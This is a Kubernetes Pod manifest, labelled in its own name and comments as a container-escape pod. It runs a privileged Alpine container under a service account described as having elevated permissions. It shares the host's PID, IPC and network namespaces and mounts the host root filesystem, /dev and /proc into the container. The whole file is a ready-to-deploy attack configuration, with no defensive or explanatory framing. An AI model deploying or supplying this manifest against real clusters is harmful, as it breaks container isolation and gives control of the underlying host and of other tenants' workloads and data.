apiVersion: v1
kind: Pod
metadata:
  name: privileged-escape-pod
spec:
  # Use the service account with elevated permissions
  serviceAccountName: health-check-sa
  # Enable host namespace sharing
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
  - name: escape
    image: alpine:latest
    command: ["/bin/sh", "-c", "sleep 360000"]
    securityContext:
      # Enable privileged mode for container escape
      privileged: true
    volumeMounts:
    # Mount the host's root filesystem
    - name: host-root
      mountPath: /host
    # Mount the host's devices
    - name: host-devices
      mountPath: /dev
    # Mount the host's proc filesystem
    - name: host-proc
      mountPath: /host-proc
  volumes:
  # Define the host root filesystem volume
  - name: host-root
    hostPath:
      path: /
      type: Directory
  # Define the host devices volume
  - name: host-devices
    hostPath:
      path: /dev
      type: Directory
  # Define the host proc filesystem volume
  - name: host-proc
    hostPath:
      path: /proc
      type: Directory
